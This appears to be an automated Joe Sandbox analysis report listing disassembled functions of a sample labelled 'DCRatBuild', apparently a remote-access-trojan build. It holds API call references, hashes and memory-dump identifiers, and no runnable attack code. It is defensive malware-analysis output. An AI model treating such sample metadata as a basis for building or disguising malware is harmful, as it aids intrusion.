                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        Function 0074DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c34d6b3f556b7fc0ebd2184780af5ef23693cec625932ebd7d22713c3e2f0ba3
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: c34d6b3f556b7fc0ebd2184780af5ef23693cec625932ebd7d22713c3e2f0ba3
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        Function 0074DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 96a99286a3839f957332000832f9b8dbc1d6d89f067570414f266d6f9a23c1b7
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: 96a99286a3839f957332000832f9b8dbc1d6d89f067570414f266d6f9a23c1b7
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        Function 0074DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e5a743c8d377ae79708e34ae952d86a788ac9beef1a57c0f9da7d949fb807c4f
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: e5a743c8d377ae79708e34ae952d86a788ac9beef1a57c0f9da7d949fb807c4f
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        Function 0074DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5681777bed350dc4214bffe45b666d943156bd5b5c7b2a0f868e77e3521772b4
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: 5681777bed350dc4214bffe45b666d943156bd5b5c7b2a0f868e77e3521772b4
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        Function 0074DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: fa60f0790a53c73438319717abb056b03407eda43b5d4c0bbd52b81c117bdee9
                                        • Instruction ID: 63102b2a12235e50ea75b6731a6c13f7059f5688476d3dcaf883e5c7671dffd2
                                        • Opcode Fuzzy Hash: fa60f0790a53c73438319717abb056b03407eda43b5d4c0bbd52b81c117bdee9
                                        • Instruction Fuzzy Hash: 15A002D536D102BC712C71516D16D3A025CC4C5B51331851AB457D4545574C5D495471
                                        Function 0074DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 00aee3598d27cf971d4663a328ceb7afb5c5c35328deda937adda5426594b05a
                                        • Instruction ID: e94dc9b8788d66c8f1a1418ddd918e112cc288974ff20afac4684b1c1c00d0e9
                                        • Opcode Fuzzy Hash: 00aee3598d27cf971d4663a328ceb7afb5c5c35328deda937adda5426594b05a
                                        • Instruction Fuzzy Hash: 38A002D536D5017C716C7151AD16D3A025CD4D1B11331851AB457D4545574C5D495471
                                        Function 0074DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: eb9e9283c11351f1825bd3f29be4633d8c96e735e76172b6dbd1c8ac2abb9f51
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: eb9e9283c11351f1825bd3f29be4633d8c96e735e76172b6dbd1c8ac2abb9f51
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        Function 0074DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 2340876abb7e65c5660d6c925b56467af8c4bd53992250b19bb1eaac4ab080ce
                                        • Instruction ID: 7ff8c56b74e64291de9f084e7032f7eb89e67787e58773429d790e4b4df59ebe
                                        • Opcode Fuzzy Hash: 2340876abb7e65c5660d6c925b56467af8c4bd53992250b19bb1eaac4ab080ce
                                        • Instruction Fuzzy Hash: 2CA012E556C102FC312C21002C26C36031CC0C5B10330480AB447E004177881C484030
                                        Function 0074DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 8bbd96b35b1a4ae3bc6ccbab36cf343823edae4e976670eafd9d766bf2c056b2
                                        • Instruction ID: 7ff8c56b74e64291de9f084e7032f7eb89e67787e58773429d790e4b4df59ebe
                                        • Opcode Fuzzy Hash: 8bbd96b35b1a4ae3bc6ccbab36cf343823edae4e976670eafd9d766bf2c056b2
                                        • Instruction Fuzzy Hash: 2CA012E556C102FC312C21002C26C36031CC0C5B10330480AB447E004177881C484030
                                        Function 0074DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 32acfb8a65e416e6302d087b8538ec437a6dc7b1b595760b8f388df083087e33
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: 32acfb8a65e416e6302d087b8538ec437a6dc7b1b595760b8f388df083087e33
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        Function 0074DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 350dd76912d3cdf6d3b5e1bf0554ae4c944e17711cfcc33d8affcf3706bafcac
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: 350dd76912d3cdf6d3b5e1bf0554ae4c944e17711cfcc33d8affcf3706bafcac
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        Function 0074DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c05520e94043544cbd854c383bf165fd2f0e74ef7dc434fb14ffac1bd9cc8e48
                                        • Instruction ID: f7a5df70f133768067073bfcb45470cade72c40473283b40d638176300c45934
                                        • Opcode Fuzzy Hash: c05520e94043544cbd854c383bf165fd2f0e74ef7dc434fb14ffac1bd9cc8e48
                                        • Instruction Fuzzy Hash: ABA012E526C002BC312811102C1BC36021CC0C1F10331440EB447C00419B480C4C5030
                                        Function 00739EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,00739104,?,?,-00001964), ref: 00739EC2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: cf71d82be241b829cedeeed7588cc5941853c1f61b0e3440539eaa89dfa07efe
                                        • Instruction ID: 0d57b15278605aca298edca0e290b85986801e6872035b26de7f7ceb658e508f
                                        • Opcode Fuzzy Hash: cf71d82be241b829cedeeed7588cc5941853c1f61b0e3440539eaa89dfa07efe
                                        • Instruction Fuzzy Hash: 42B011300A800A8A8E002B30CE088283A22EA2230A30082A0A003CA0A0CB22C00AAA00
                                        Function 0074A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?,0074A587,C:\Users\user\Desktop,00000000,0077946A,00000006), ref: 0074A326
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 9df4a329bcfa5798f265073aaefe5534a5d1e8d244b8b92e04d9b1f94f38048e
                                        • Instruction ID: 9170b57727309be6cbd60244d6f5483632ea7a36d1dbccaa313297afe87c0d30
                                        • Opcode Fuzzy Hash: 9df4a329bcfa5798f265073aaefe5534a5d1e8d244b8b92e04d9b1f94f38048e
                                        • Instruction Fuzzy Hash: B3A0123019410A578A000B30CC09C1576505761702F00C620B003C00A0CB348814E504
                                        Function 007396D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNELBASE(000000FF,?,?,0073968F,?,?,?,?,00761FA1,000000FF), ref: 007396EB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 2ff32ed1fcbb1c2dc583a2d5c23893a58f72ca947c403318b3ad1727dd524a5f
                                        • Instruction ID: dbe0eda6b252774dbde0ae62214db3373b58709ce98433ba560139d90525ed20
                                        • Opcode Fuzzy Hash: 2ff32ed1fcbb1c2dc583a2d5c23893a58f72ca947c403318b3ad1727dd524a5f
                                        • Instruction Fuzzy Hash: 25F05E30597B04DFFB308A24D949792B7E4AB12725F048B1ED1EB434E1A7A9694D8B40

                                        Non-executed Functions

                                        Function 0074B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0074B971
                                        • EndDialog.USER32(?,00000006), ref: 0074B984
                                        • GetDlgItem.USER32(?,0000006C), ref: 0074B9A0
                                        • SetFocus.USER32(00000000), ref: 0074B9A7
                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 0074B9E1
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0074BA18
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0074BA2E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0074BA4C
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0074BA5C
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0074BA78
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0074BA94
                                        • _swprintf.LIBCMT ref: 0074BAC4
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
